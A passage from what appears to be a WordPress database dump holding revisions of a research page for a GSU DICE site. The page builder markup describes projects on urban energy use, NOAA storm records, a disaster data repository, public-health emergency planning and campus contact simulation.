language narratives, and these narrative/s have the potential\n of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col-auto style-359-outer style-local-126-c19-outer\">\n <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-364 style-local-126-c24\">\n <!---->\n <!---->\n <h5 class=\"\">The DICE Data Repository </h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n ontology will define semantics associated with adverse events & corresponding response and recovery efforts. \n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-384 style-local-126-c29\">\n <!---->\n <!---->\n <h5 class=\"\">Orpheus</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-350 style-local-126-c12\">\n <!---->\n <!---->\n <h5 class=\"\">GSU Contact Network Prediction</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects our approach to this\n research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:38:20','2023-09-29 14:38:20','',126,'https://gsudice.dataconn.net/?p=1477',0,'revision','',0),(1483,1,'2023-09-29 10:38:40','2023-09-29 14:38:40','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"30\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 10:38:40','2023-09-29 14:38:40','',438,'https://gsudice.dataconn.net/?p=1483',0,'revision','',0),(1484,1,'2023-09-29 10:38:40','2023-09-29 14:38:40','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-392 style-local-126-c36\">\n <!---->\n <!---->\n <h5 class=\"\">Urban Scale Energy Assessments</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n propose a plan for grid distribution optimized for human-centric usage and need.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-356 style-local-126-c17\">\n <!---->\n <!---->\n <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-364 style-local-126-c24\">\n <!---->\n <!---->\n <h5 class=\"\">The DICE Data Repository </h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n ontology will define semantics associated with adverse events & corresponding response and recovery efforts. \n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c29\" 